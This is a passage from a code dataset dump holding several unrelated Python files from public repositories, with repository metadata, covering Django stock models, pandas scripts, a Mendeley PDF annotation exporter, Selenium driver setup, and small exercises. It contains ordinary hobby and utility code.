unicode_literals\n\nfrom jsonfield import JSONField\nimport datetime\n\nfrom django.db import models\nfrom django.utils import timezone\n\nfrom stocks.backends import AlphavantageBackend\n\n\nclass BaseModel(models.Model):\n \"\"\"\n Base model that others can inherit to get some basic datetimes\n \"\"\"\n datetime_created = models.DateTimeField(auto_now_add=True)\n datetime_updated = models.DateTimeField(auto_now=True)\n is_active = models.BooleanField(default=True)\n\n class Meta:\n abstract = True\n\n\nclass Sector(BaseModel):\n \"\"\"\n Sector which we use to organize tickers/companies by\n \"\"\"\n name = models.CharField(max_length=255, blank=False)\n slug = models.SlugField(unique=True, blank=False)\n\n def __unicode__(self):\n return u\"%s\" % self.name\n\n\nclass Company(BaseModel):\n \"\"\"\n Company, might have multiple tickers based on exchange\n \"\"\"\n name = models.CharField(max_length=255, blank=False)\n description = models.TextField(blank=True)\n website_url = models.CharField(max_length=255, blank=True)\n tags = models.ManyToManyField(\"Tag\", blank=True)\n sector = models.ForeignKey(\"Sector\", null=True, blank=True)\n\n def __unicode__(self):\n return u\"%s\" % self.name\n\n\nclass Exchange(BaseModel):\n \"\"\"\n Exchange that Stocks trade on\n \"\"\"\n name = models.CharField(max_length=255, blank=False)\n symbol = models.CharField(max_length=10, blank=False)\n ticker_suffix = models.CharField(max_length=2, blank=True, default='')\n currency = models.ForeignKey('Currency', null=False, blank=False)\n\n def __unicode__(self):\n return u\"%s\" % self.symbol\n\n\nclass Currency(BaseModel):\n \"\"\"\n Currency that an exchange trades with\n \"\"\"\n name = models.CharField(max_length=255, blank=False)\n symbol = models.CharField(max_length=10, blank=False)\n character = models.CharField(max_length=1, blank=False)\n\n def __unicode__(self):\n return u\"%s (%s)\" % (self.symbol, self.symbol)\n\n\nclass Stock(BaseModel):\n \"\"\"\n A stock which belongs to a Company, trades on an Exchange\n \"\"\"\n ticker = models.CharField(max_length=10, blank=False)\n exchange = models.ForeignKey('Exchange', null=False, blank=False)\n company = models.ForeignKey('Company', null=False, blank=False)\n market_cap = models.BigIntegerField(default=0)\n\n # today's numbers\n previous_close = models.DecimalField(default=0.0, max_digits=10, decimal_places=2, null=True)\n open = models.DecimalField(default=0.0, max_digits=10, decimal_places=2, null=True)\n current = models.DecimalField(default=0.0, max_digits=10, decimal_places=2, null=True)\n volume = models.BigIntegerField(default=0, null=True)\n\n # calculated numbers\n daily_diff = models.DecimalField(default=0.0, max_digits=10, decimal_places=2, null=True)\n daily_diff_percent = models.DecimalField(default=0.0, max_digits=10, decimal_places=2, null=True)\n\n @property\n def full_ticker(self):\n if self.exchange.ticker_suffix:\n return \"%s.%s\" % (self.ticker, self.exchange.ticker_suffix)\n return self.ticker\n\n def save(self, *args, **kwargs):\n \"\"\"\n Calculates diffs\n \"\"\"\n if self.current and self.previous_close:\n self.daily_diff = self.current - self.previous_close\n self.daily_diff_percent = 100 * self.daily_diff / self.previous_close\n super(Stock, self).save(*args, **kwargs)\n\n def __unicode__(self):\n return u\"%s (%s)\" % (self.ticker, self.company.name)\n\n\nclass Tag(BaseModel):\n \"\"\"\n A company can be tagged with multiple tags that users can filter/search by\n \"\"\"\n name = models.CharField(max_length=255, blank=False)\n\n def __unicode__(self):\n return u\"%s\" % (self.name)\n\n\nclass TimeseriesResult(BaseModel):\n \"\"\"\n A saved timeseries for a stock based on time period & time interval\n \"\"\"\n\n TIME_PERIOD_CHOICES = (\n ('current', 'Current'),\n ('1d', 'One Day'),\n ('5d', 'Five Days'),\n ('2w', 'Two Weeks'),\n ('1m', 'One Month'),\n ('3m', 'Three Months'),\n ('1y', 'One Year'),\n ('max', 'Max Time Period'),\n )\n\n stock = models.ForeignKey('Stock', null=False, blank=False)\n time_period = models.CharField(\n max_length=7,\n choices=TIME_PERIOD_CHOICES,\n blank=False, null=False)\n result = JSONField()\n\n # determines if a result is stale based on when it was last updated\n def _result_is_stale(self):\n if self.datetime_updated and self.result:\n if self.time_period in [\"1d\", \"current\"] and self.datetime_updated > timezone.now() - datetime.timedelta(minutes=1):\n return False\n if self.time_period in [\"5d\", \"2w\"] and self.datetime_updated > timezone.now() - datetime.timedelta(minutes=15):\n return False\n if self.time_period in ['1m', '3m', '1y', 'max'] and self.datetime_updated > timezone.now() - datetime.timedelta(days=1):\n return False\n return True\n\n def get_updated_result(self):\n if self._result_is_stale():\n backend = AlphavantageBackend(self.stock.full_ticker)\n data = backend.get_result(self.time_period)\n self.result = data\n self.save()\n return self.result\n\n class Meta():\n unique_together = ((\"stock\", \"time_period\"),)\n\n def __unicode__(self):\n return u\"%s - %s\" % (self.stock.ticker, self.time_period)\n","repo_name":"thefedoration/chart-bud","sub_path":"src/stocks/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15816191892","text":"from fastapi import FastAPI\nimport asyncio\n\napp = FastAPI()\nx = [1] # a global variable x\n\n\n@app.get(\"/\")\ndef hello():\n return {\"message\": \"hello\", \"x\": x}\n\n\nasync def periodic():\n while True:\n # code to run periodically starts here\n x[0] += 1\n print(f\"x is now {x}\")\n # code to run periodically ends here\n # sleep for 3 seconds after running above code\n await asyncio.sleep(3)\n\n\n@app.on_event(\"startup\")\nasync def schedule_periodic():\n loop = asyncio.get_event_loop()\n loop.create_task(periodic())\n\n\nif __name__ == \"__main__\":\n import uvicorn\n\n uvicorn.run(app)\n","repo_name":"Zephyrsz/faskApiWorkshop","sub_path":"backend/backendtaskDemo2.py","file_name":"backendtaskDemo2.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26150905583","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nfrom datetime import datetime,date\nfrom datetime import timedelta\nimport pandasql as pdsql\n\nfrom pandasql import sqldf\n\n#Keep good names for your variables lady\ndata=pd.read_csv('C:/Analytics/dataset/data_science_challenge_samp_18.csv')\ndata2=pd.read_csv('C:/Analytics/dataset/data_science_challenge_samp_18.csv')\n\ndata2['order_date']=pd.to_datetime(data2['order_date'])\ndata2['yyyy_w']=data2['order_date'].apply(lambda x: str(x.isocalendar()[0])+'-'+str(x.isocalendar()[1]))\n\n#here as well\nq1 =\"select cust_id,yyyy_w,sum(units_purchased)as total_purchased,sum(total_spend)as total_spent from data2 group by cust_id,yyyy_w;\"\nf1=pdsql.sqldf(q1)\n#print(f1)\ncats = ['a', 'b', 'c']\ndf4 = pd.DataFrame({'cat': ['a', 'b', 'a']})\n\n#use some methods please instead of a whole thing\ndummies = pd.get_dummies(df4, prefix='', prefix_sep='')\ndummies = dummies.T.reindex(cats).T.fillna(0)\n\n#try to create contants\nlane=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17]\nprint(\"\")\ndummies=pd.get_dummies(data['lane_number'],prefix='', prefix_sep='')\ndummies = dummies.T.reindex(lane).T.fillna(0)\n#print(dummies)\n\n#print(data)\n#print(type(data))\n#print(type(dummies))\noriginal=pd.concat([data,dummies], axis=1)\n\n#print(original)\ndata['order_date']=pd.to_datetime(data['order_date'])\ndata['yyyy_w']=data['order_date'].apply(lambda x: str(x.isocalendar()[0])+'-'+str(x.isocalendar()[1]))\n\n#print(data)\n#data['visit']\n\n\nstart_date = min(data['order_date'])\nend_date = max(data['order_date'])\n#print(str(start_date))\n#print(str(datetime.now()+timedelta(4)))\ndates= [ start_date + timedelta(n) for n in range(int ((end_date - start_date).days))]\n#print(int ((end_date - start_date).days))\n#print(type(dates))\n#dates=pd.to_datetime(data['dates'])\n#dates=dates.to_frame()\ndf3=pd.DataFrame(np.array(dates))\ndf3.columns=['order_date']\n#print(df3)\n#print(type(df3))\ndf4=data.head(10)\nq2 =\"select distinct df3.order_date, df4.cust_id from df3, df4;\"\n\nf2=pdsql.sqldf(q2)\nprint('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')\nprint(f2.loc(0,'order_date'))\nf2['order_date']=pd.to_datetime(f2['order_date'])\n#print(f2)\n#print(df4)\n#print(df4.cust_id)\n#q3= \"select * from df4 left join f2 on df4.order_date=f2.order_date where df4.cust_id=f2.cust_id; \"\n#f3=pdsql.sqldf(q3)\n#print(f3)\nf3=f2.head(10)\nprint (f3)\n\nprint('****************************************')\n\n#df4['order_date']=pd.to_datetime(df4['order_date'])\nprint(df4)\nprint('***************************************')\nresult=pd.merge(f3,df4, on=['cust_id','order_date'], how='left')\nprint (result.head(500));\nresult.to_csv('C:/Analytics/dataset/test2.csv', sep=',' )\n#for index, row in df.iterrows():\nleft1 = pd.DataFrame({'key': ['K0', 'K1', 'K54', 'K3','k4','K0'],\n 'A': ['A0', 'A1', 'A2', 'A3','A4','A1'],\n 'B': ['B0', 'B1', 'B2', 'B3','B4','B5']})\n \n\nprint(left1)\nright1 = pd.DataFrame({'key': ['K0', 'K0', 'K21', 'K3'],\n 'A': ['A0', 'A1', 'A2', 'A3'],\n 'C': ['C0', 'C1', 'C2', 'C3'],\n 'D': ['D0', 'D1', 'D2', 'D3']})\n\nprint(right1)\n\nresult=pd.merge(left1,right1, on=['key','A'], how='left')\nprint(result)\n\n\n\n\n \n\n","repo_name":"Akanksharajp/titanic","sub_path":"DataProcessor.py","file_name":"DataProcessor.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11828600545","text":"import os\nimport random\nimport numpy as np\nimport torch\n\n\ndef set_all_seeds(seed):\n os.environ[\"PL_GLOBAL_SEED\"] = str(seed)\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\n\ndef set_deterministic():\n if torch.cuda.is_available():\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n torch.set_deterministic(True)\n","repo_name":"rasbt/deeplearning-models","sub_path":"pytorch_ipynb/helper_utils.py","file_name":"helper_utils.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":16055,"dataset":"github-code","pt":"3"} +{"seq_id":"31189208420","text":"#!/usr/bin/python3\n\nimport PIL\nfrom PIL import Image\nimport os\n\nwhile True:\n file_path = input(\"Enter image file path: \")\n ext = os.path.splitext(file_path)[-1].lower()\n pil_image = PIL.Image.open(file_path)\n if ext == \".png\":\n pilimg = PIL.Image.open(file_path)\n wid, hei = pilimg.size\n image_res = str(wid)+\"x\"+str(hei)\n if image_res == \"100x100\":\n break\n else:\n print()\n print(\"Image must be 100x100 pixels.\")\n else:\n print()\n print(\"Invalid file. Select a .png image.\")\n\npixelarray = [0, 0]\n\ncolor0 = []\ncolor1 = []\ncolor2 = []\ncolor3 = []\ncolor4 = []\ncolor5 = []\n\nwhile pixelarray <= [99, 99]:\n current_pixel = (pixelarray[0], pixelarray[1])\n pixel_color = pil_image.getpixel(current_pixel)\n if pixel_color[0] >= 0 and pixel_color[0] <= 42:\n color0.append(current_pixel)\n print(\"appended1\")\n elif pixel_color[0] >= 43 and pixel_color[0] <= 84:\n color1.append(current_pixel)\n print(\"appended2\")\n elif pixel_color[0] >= 85 and pixel_color[0] <= 126:\n color2.append(current_pixel)\n elif pixel_color[0] >= 127 and pixel_color[0] <= 168:\n color3.append(current_pixel)\n elif pixel_color[0] >= 168 and pixel_color[0] <= 210:\n color4.append(current_pixel)\n elif pixel_color[0] >= 211 and pixel_color[0] <= 255:\n color5.append(current_pixel)\n\n if pixelarray[0] < 99:\n pixelarray[0] += 1\n elif pixelarray[1] == 99:\n break\n else:\n pixelarray[1] += 1\n pixelarray[0] = 0\n\n print(pixelarray)\n\nprint(\"------------------------ color0 ------------------------\")\nprint(color0)\nprint()\n\nprint(\"------------------------ color1 ------------------------\")\nprint(color1)\nprint()\n\nprint(\"------------------------ color2 ------------------------\")\nprint(color2)\nprint()\n\nprint(\"------------------------ color3 ------------------------\")\nprint(color3)\nprint()\n\nprint(\"------------------------ color4 ------------------------\")\nprint(color4)\nprint()\n\nprint(\"------------------------ color5 ------------------------\")\nprint(color5)\nprint()\n","repo_name":"Zbomb2000/Graphing-Image-Renderer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71697238801","text":"# /usr/bin/python\n# -*- coding: utf-8; py-indent-offset:4 -*-\nimport sys\nimport getopt\n\ndef showImageInHTML(imageTypes,savedir):\n files=getAllFiles(savedir+'/pic')\n images=[f for f in files if f[f.rfind('.')+1:] in imageTypes]\n images=[item for item in images if os.path.getsize(item)>5*1024]\n images=['pic'+item[item.rfind('/'):] for item in images]\n newfile='%s/%s'%(savedir,'images.html')\n with open(newfile,'w') as f:\n f.write('
')\n for image in images:\n f.write(\"\\n\"%image)\n f.write('
')\n print('success,images are wrapped up in %s'%newfile)\n\nclass Usage(Exception):\n def __init__(self, msg):\n self.msg = msg\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv\n try:\n try:\n opts, args = getopt.getopt(argv[1:], \"h\", [\"help\"])\n except getopt.error:\n raise Usage(msg)\n except Usage:\n return 2\n\nif __name__ == \"__main__\":\n sys.exit(main())","repo_name":"4v/finstate","sub_path":"aaahtml.py","file_name":"aaahtml.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8332800198","text":"from __future__ import print_function\nimport sqlite3\ntry:\n from urllib.parse import unquote, urlparse\nexcept:\n from urlparse import urlparse\n from urllib import unquote\nimport os\nimport pdfannotation\nimport PyPDF2\nimport warnings\nfrom dateutil import parser as dtparser\n\nglobal OVERWRITE_PDFS\nOVERWRITE_PDFS = False\n\ndef convert2datetime(s):\n return dtparser.parse(s)\n\ndef converturl2abspath(url):\n \"\"\"Convert a url string to an absolute path\"\"\"\n try:\n pth = unquote(urlparse(url).path) #this is necessary for filenames with unicode strings\n except:\n pth = unquote(str(urlparse(url).path)).decode(\"utf8\") #this is necessary for filenames with unicode strings\n return os.path.abspath(pth)\n\ndef get_highlights_from_db(db, results={}):\n \"\"\"Extract the locations of highlights from the Mendeley database\n and put results into dictionary.\n\n Parameters\n ==========\n db : sqlite3.connection\n Mendeley sqlite database\n results : dict, optional\n Dictionary to hold the results. Default is an empty dictionary.\n\n Returns\n =======\n results : dict\n dictionary containing the query results\n \"\"\"\n query = \"\"\"SELECT Files.localUrl, FileHighlightRects.page,\n FileHighlightRects.x1, FileHighlightRects.y1,\n FileHighlightRects.x2, FileHighlightRects.y2,\n FileHighlights.createdTime, FileHighlights.color\n FROM Files\n LEFT JOIN FileHighlights\n ON FileHighlights.fileHash=Files.hash\n LEFT JOIN FileHighlightRects\n ON FileHighlightRects.highlightId=FileHighlights.id\n WHERE (FileHighlightRects.page IS NOT NULL)\"\"\"\n ret = db.execute(query)\n for r in ret:\n pth = converturl2abspath(r[0])\n pg = r[1]\n bbox = [[r[2], r[3], r[4], r[5]]]\n cdate = convert2datetime(r[6])\n color = r[7]\n hlight = {\"rect\": bbox, \"cdate\": cdate, \"color\": color}\n if pth in results:\n if pg in results[pth]:\n if 'highlights' in results[pth][pg]:\n results[pth][pg]['highlights'].append(hlight)\n else:\n results[pth][pg]['highlights'] = [hlight]\n else:\n results[pth][pg] = {'highlights': [hlight]}\n else:\n results[pth] = {pg: {'highlights':[hlight]}}\n return results\n\ndef get_notes_from_db(db, results={}):\n \"\"\"Extract notes from the Mendeley database\n and put results into dictionary.\n\n Parameters\n ==========\n db : sqlite3.connection\n Mendeley sqlite database\n results : dict, optional\n Dictionary to hold the results. Default is an empty dictionary.\n\n Returns\n =======\n results : dict\n dictionary containing the query results\n \"\"\"\n query = \"\"\"SELECT Files.localUrl, FileNotes.page,\n FileNotes.x, FileNotes.y,\n FileNotes.author, FileNotes.note,\n FileNotes.modifiedTime, FileNotes.color\n FROM Files\n LEFT JOIN FileNotes\n ON FileNotes.fileHash=Files.hash\n WHERE FileNotes.page IS NOT NULL\"\"\"\n ret = db.execute(query)\n for r in ret:\n pth = converturl2abspath(r[0])\n pg = r[1]\n bbox = [r[2], r[3], r[2]+30, r[3]+30] # needs a rectangle however size does not matter\n author = r[4]\n txt = r[5]\n cdate = convert2datetime(r[6])\n color = r[7]\n note = {\"rect\": bbox, \"author\": author, \"content\": txt, \"cdate\":cdate, \"color\": color}\n if pth in results:\n if pg in results[pth]:\n if 'notes' in results[pth][pg]:\n results[pth][pg]['notes'].append(note)\n else:\n results[pth][pg]['notes'] = [note]\n else:\n results[pth][pg] = {'notes': [note]}\n else:\n results[pth] = {pg: {'notes':[note]}}\n return results\n\ndef add_annotation2pdf(inpdf, outpdf, annotations):\n for pg in range(1, inpdf.getNumPages()+1):\n inpg = inpdf.getPage(pg-1)\n if pg in annotations.keys():\n if 'highlights' in annotations[pg]:\n for hn in annotations[pg]['highlights']:\n if hn['color'] is not None:\n annot = pdfannotation.highlight_annotation(hn[\"rect\"], cdate=hn[\"cdate\"], color=hn[\"color\"])\n else:\n annot = pdfannotation.highlight_annotation(hn[\"rect\"], cdate=hn[\"cdate\"])\n pdfannotation.add_annotation(outpdf, inpg, annot)\n if 'notes' in annotations[pg]:\n for nt in annotations[pg]['notes']:\n if nt['color'] is not None:\n note = pdfannotation.text_annotation(nt[\"rect\"], contents=nt[\"content\"], author=nt[\"author\"],\n color=nt[\"color\"], cdate=nt[\"cdate\"])\n else:\n note = pdfannotation.text_annotation(nt[\"rect\"], contents=nt[\"content\"], author=nt[\"author\"],\n cdate=nt[\"cdate\"])\n pdfannotation.add_annotation(outpdf, inpg, note)\n outpdf.addPage(inpg)\n return outpdf\n\ndef processpdf(fn, fn_out, annotations):\n try:\n inpdf = PyPDF2.PdfFileReader(open(fn, 'rb'), strict=False)\n if inpdf.isEncrypted:\n # PyPDF2 seems to think some files are encrypted even\n # if they are not. We just ignore the encryption.\n # This seems to work for the one file where I saw this issue\n inpdf._override_encryption = True\n inpdf._flatten()\n except IOError:\n print(\"Could not find pdffile %s\"%fn)\n return\n outpdf = PyPDF2.PdfFileWriter()\n outpdf = add_annotation2pdf(inpdf, outpdf, annotations)\n if os.path.isfile(fn_out):\n if not OVERWRITE_PDFS:\n print(\"%s exists skipping\"%fn_out)\n return\n else:\n print(\"overwriting %s\"%fn_out)\n else:\n print(\"writing pdf to %s\"%fn_out)\n outpdf.write(open(fn_out, \"wb\"))\n\ndef mendeley2pdf(fn_db, dir_pdf):\n db = sqlite3.connect(fn_db)\n highlights = get_highlights_from_db(db)\n annotations_all = get_notes_from_db(db, highlights)\n for fn, annons in annotations_all.items():\n try:\n processpdf(fn, os.path.join(dir_pdf, os.path.basename(fn)), annons)\n except PyPDF2.utils.PdfStreamError:\n print(\"I appear to have run out of things to join together on %s.\"%fn)\n pass\n except PyPDF2.utils.PdfReadError:\n print(\"I appear to have run out of things to read on %s.\"%fn)\n pass\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"mendeleydb\", help=\"The mendeley sqlite database file\",\n type=str)\n parser.add_argument(\"dest\", help=\"\"\"The destination directory where to\n save the annotated pdfs\"\"\", type=str)\n parser.add_argument(\"-w\", \"--overwrite\", help=\"\"\"Overwrite any PDF files in\n the destination directory\"\"\", action=\"store_true\")\n args = parser.parse_args()\n fn = os.path.abspath(args.mendeleydb)\n dir_pdf = os.path.abspath(args.dest)\n if args.overwrite:\n OVERWRITE_PDFS = True\n mendeley2pdf(fn, dir_pdf)\n","repo_name":"cycomanic/Menextract2pdf","sub_path":"src/menextract2pdf.py","file_name":"menextract2pdf.py","file_ext":"py","file_size_in_byte":7615,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"3"} +{"seq_id":"24812329230","text":"class Solution:\n def minAreaRect(self, points: List[List[int]]) -> int:\n \n n = len(points)\n nx = len(set(x for x, y in points))\n ny = len(set(y for x, y in points))\n \n # Edge case - no rectangles can be made.\n if nx == n or ny == n:\n return 0\n \n point_map = collections.defaultdict(list)\n \n # Grab list of points with same x or y value based on whichever one has more\n # Because we'll eventually loop through every possible combination in this array,\n # we want it to have as little values as possible. So if we have more x values,\n # We'll make the array from the y values. \n if nx > ny:\n for x, y in points:\n point_map[x].append(y)\n \n else:\n for x, y, in points:\n point_map[y].append(x)\n \n # This hash will hold the very last x value we've seen for any y1, y2 pair with the same x value\n # Because the smallest area of the rectangle in a sorted list of x values is the current + the last one\n # we saw. So we can \"forget\" any that we've seen before that because those areas will be larger.\n lastx = {}\n \n ans = float('inf')\n \n # Sort x values from lowest to highest then iterate through them\n for x in sorted(point_map):\n # Sort the y values because lower values = less area\n point_map[x].sort()\n # Loop through each of those y values\n for i in range(len(point_map[x])):\n # Loop up to that point for possible combos\n for j in range(i):\n # Initialize variables\n y1, y2 = point_map[x][i], point_map[x][j]\n \n # If we've seen this combo of y values with a different x value before,\n # then we can make a rectangle from this\n if (y1, y2) in lastx:\n # Calculate area and choose lesser value\n ans = min(ans, (x - lastx[y1, y2]) * abs(y1 - y2) )\n \n # Then set this into the lastx\n lastx[y1, y2] = x\n \n return ans if ans < float('inf') else 0","repo_name":"PigsGoMoo/LeetCode","sub_path":"minimum-area-rectangle/minimum-area-rectangle.py","file_name":"minimum-area-rectangle.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5143092342","text":"\"Another simple primal infeasible example\"\nfrom gpkit import Variable, Model\n\nx = Variable(\"x\")\ny = Variable(\"y\", 2)\n\nconstraints = [\n x >= 1,\n 0.5 <= x*y,\n x*y <= 1.5\n ]\n\nobjective = x*y\nm = Model(objective, constraints)\n\n# raises UnknownInfeasible on cvxopt and PrimalInfeasible on mosek\n# m.solve()\n","repo_name":"convexengineering/gpkit","sub_path":"docs/source/examples/primal_infeasible_ex2.py","file_name":"primal_infeasible_ex2.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"3"} +{"seq_id":"37202006549","text":"# -*- coding:utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\n# 创建一个Series数组,生成1000个随机标准正态分布���浮点数,索引是时间序列\nts = pd.Series(np.random.randn(1000), index=pd.date_range('1/1/2000', periods=1000))\nprint(ts)\nprint('*' * 100)\n\n# 求累加值\nts = ts.cumsum()\nprint(ts)\nprint('*' * 100)\n\n# 我们可以使用 plt.plot(x=, y=),把x,y的数据作为参数存进去,\n# 但是ts本来就是一个数据,所以我们可以直接plot\n# 上面的Series数组第一列index就是X坐标,第二列就是对应的值\nts.plot()\n\n# 同样可以使用plt传入各种图形设置\n# 默认为选取最优化的设置\n\nplt.show()","repo_name":"FelixZFB/Python_data_analysis","sub_path":"001_Python_from_introduction_to_practice/009_pandas_matplotlib_绘图接口/001_pandas_Series数据_plot绘制折线图.py","file_name":"001_pandas_Series数据_plot绘制折线图.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71845833040","text":"def primo(number):\r\n \"\"\"\r\n It return a boolean value, True if de number os prime, False is the number is not prime\r\n \"\"\"\r\n primo = True\r\n for i in range(2, number): # o divisor varia entre 2 e o numero-1\r\n resto = number % i\r\n if resto == 0: # quando encontro um resto 0 => não é primo\r\n primo = False\r\n break\r\n return primo\r\n\r\n\r\nnumber = int(input(\"Indicate a number:\"))\r\nestado = primo(number)\r\nif estado==True:\r\n print(\"O numero {0} é primo\" .format(number))\r\nelse:\r\n print(\"O numero {0} não é primo\" .format(number))\r\n\r\n","repo_name":"mariopinto18/ESMAD-AED-23-24","sub_path":"Ficha 04/Exemplo1.py","file_name":"Exemplo1.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4833104903","text":"#!python\n\nfrom datawire.utils import DataWireResult\nfrom datawire.utils.random import DataWireRandom\n\ndef checkStringify(name, dwr, wanted):\n stringified = u\"%s\" % dwr\n\n if stringified != wanted:\n print(\"\\n! %s: %s\" % (name, repr(stringified)))\n print(\" %s %s\" % (' ' * len(name), repr(wanted)))\n\n assert stringified == wanted\n\nclass TestDWUtils (object):\n def test_result(self):\n r1 = DataWireResult(ok=True, alpha=\"Alice\", beta=True)\n assert r1\n checkStringify(\"r1\", r1, u\"\")\n\n r2 = DataWireResult(ok=False, error='Error String Here')\n assert not r2\n checkStringify(\"r2\", r2, u\"\")\n\n r2a = DataWireResult(ok=False, error=\"Error String Here\", extraThing=\"badness\")\n assert not r2a\n checkStringify(\"r2a\", r2a, u\"\")\n\n r2b = DataWireResult.fromError(\"Error String Here\")\n assert not r2b\n checkStringify(\"r2b\", r2b, u\"\")\n\n r2c = DataWireResult.fromError(\"Error String Here\", errorReturn=503)\n assert not r2c\n checkStringify(\"r2c\", r2c, u\"\")\n\n r3 = DataWireResult.fromErrorAndResults(alpha=\"Alice\", beta=True)\n assert r3\n checkStringify(\"r3\", r3, u\"\")\n\n r4 = DataWireResult.fromErrorAndResults(error=\"Error String Here\")\n assert not r4\n checkStringify(\"r4\", r4, u\"\")\n\n r4a = DataWireResult.fromErrorAndResults(error=\"Error String Here\", intention=42)\n assert not r4a\n checkStringify(\"r4a\", r4a, u\"\")\n\n r5 = DataWireResult.fromErrorAndResults(error=None, alpha=\"Alice\", beta=True)\n assert r5\n checkStringify(\"r5\", r5, u\"\")\n\n r6 = DataWireResult.fromErrorAndResults(alpha=\"Alice\", beta=True)\n assert r6\n checkStringify(\"r6\", r6, u\"\")\n\n r7 = DataWireResult.fromJSON(r6.toJSON())\n assert r7\n checkStringify(\"r7\", r7, u\"\")\n\n r8 = DataWireResult.fromErrorAndResults(error=\"Error String Here\")\n assert not r8\n checkStringify(\"r8\", r8, u\"\")\n\n r9 = DataWireResult.fromJSON(r8.toJSON())\n assert not r9\n checkStringify(\"r9\", r9, u\"\")\n\n r8a = DataWireResult.fromErrorAndResults(error=\"Error String for 8a\", thisIs=\"test 8a\", andItIs=\"anError\")\n assert not r8a\n checkStringify(\"r8a\", r8a, u\"\")\n\n r9a = DataWireResult.fromJSON(r8a.toJSON())\n assert not r9a\n checkStringify(\"r9a\", r9a, u\"\")\n\n r10a = DataWireResult.fromJSON('{\"thisIs\": \"test 10\", \"andItIs\": \"anError\", \"ok\": false, \"error\": \"Error String for 10\"}')\n assert not r10a\n checkStringify(\"r10a\", r10a, u\"\")\n\n def test_randomID(self):\n \"\"\"Check out random IDs.\"\"\"\n\n randomness = DataWireRandom()\n\n seen = {}\n\n for i in range(10):\n x = randomness.randomID()\n\n # print(x)\n\n if x in seen:\n assert False\n\n seen[x] = True\n\n assert True\n","repo_name":"datawire/datawire-cli","sub_path":"tests-local/testUtils.py","file_name":"testUtils.py","file_ext":"py","file_size_in_byte":3398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29241954924","text":"ListString = []\ncount = 0\n\n\nfor i in range(5) :\n String = input(\"Please enter a string: \")\n ListString.append(String)\n\nfor i in ListString:\n if(len(i) >= 4 and i[0]==i[len(i)-1]) :\n count += 1\n\nprint(ListString)\nprint(count)","repo_name":"omuu554/PythonProjects2","sub_path":"ListsWork/List18.py","file_name":"List18.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42313291763","text":"# Built-in imports\nfrom platform import system, machine\n\n# Package imports\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.chrome.options import Options\nfrom webdriver_manager.chrome import ChromeDriverManager\n#from pyvirtualdisplay import Display\n\n# Setup Driver\ndef setup_driver(headless=False):\n options = Options()\n\n if (headless):\n headless_opts = [\n \"--headless\",\n \"--disable-gpu\",\n \"--window-size=1920,1200\",\n \"---ignore-certificate-errors\",\n \"--disable-extensions\",\n #\"--no-sandbox\",\n #\"--disable-dev-shm-usage\",\n #\"--remote-debugging-port=9515\",\n #\"--disable-setuid-sandbox\"\n ]\n for opt in headless_opts:\n options.add_argument(opt)\n #print(opt)\n \n # Much thanks to https://stackoverflow.com/a/71042821\n raspberry_pi = system() == \"Linux\" and machine() == \"armv7l\"\n if not raspberry_pi:\n service = Service(ChromeDriverManager().install())\n else:\n #display = Display(visible=0, size=(1920,1200))\n #display.start()\n raspbian_chromium = \"/usr/lib/chromium-browser/chromedriver\"\n service = Service(raspbian_chromium)\n #options.binary_location = raspbian_chromium\n\n return webdriver.Chrome(service=service, options=options)\n\n\n","repo_name":"Denperidge/facebook-event-aggregator","sub_path":"app/scrape_and_parse/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"41032259888","text":"import numpy as np\nfrom Algorithms import Algorithms\nfrom GraphTopology import GraphType\nimport pickle\nimport argparse\nimport read_dataset\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-K\", \"--K\", help=\"number of eigenvectors to be estimated, default number is 5\", type = int, default=5)\nparser.add_argument(\"-n\", \"--num_nodes\", help=\"number of nodes in the network, default number is 10\", type = int, default=10)\nparser.add_argument(\"-s\", \"--stepsize\", help=\"step size (or learning rate) for DSA and centralized GHA algorithms, default value is 0.1\", type = float, default=0.1)\nparser.add_argument(\"-ds\", \"--dataset\", help=\"dataset used for the experiment, default is MNIST\",\n choices=['mnist', 'cifar10'], type = str, 